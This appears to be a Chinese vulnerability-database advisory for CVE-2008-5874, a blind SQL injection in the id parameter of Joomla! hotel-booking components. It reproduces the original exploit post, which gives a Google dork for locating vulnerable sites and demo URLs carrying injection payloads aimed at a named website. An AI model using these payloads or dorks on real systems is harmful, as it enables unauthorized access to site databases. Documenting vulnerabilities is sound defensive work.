Joomla! HBS index.php脚本id参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117118 漏洞类型 SQL注入
发布时间 2008-12-23 更新时间 2009-01-08
CVE编号 CVE-2008-5874 CNNVD-ID CNNVD-200901-079
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7568
https://www.securityfocus.com/bid/80806
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-079
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS)。Joomla!HotelBookingReservationSystem(又称HBS)中存在多个SQL注入漏洞。远程攻击者可以借助对(1)com_allhotels或(2)com_5starhotels模块中的index.php的显示酒店详情操作中的id参数,执行任意的SQL指令。
|漏洞EXP
Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/

DorK : inurl:index.php?option=com_allhotels

Demo :
_______


http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________

 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

# milw0rm.com [2008-12-23]
|受影响的产品
Joomlahbs Hotel Booking Reservation System Nil Joomlahbs Com Allhotels Nil Joomlahbs Com 5Starhotels Nil
|参考资料

来源:BID
名称:32952
链接:http://www.securityfocus.com/bid/32952
来源:MILW0RM
名称:7575
链接:http://www.milw0rm.com/exploits/7575
来源:MILW0RM
名称:7568
链接:http://www.milw0rm.com/exploits/7568
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/32952.pl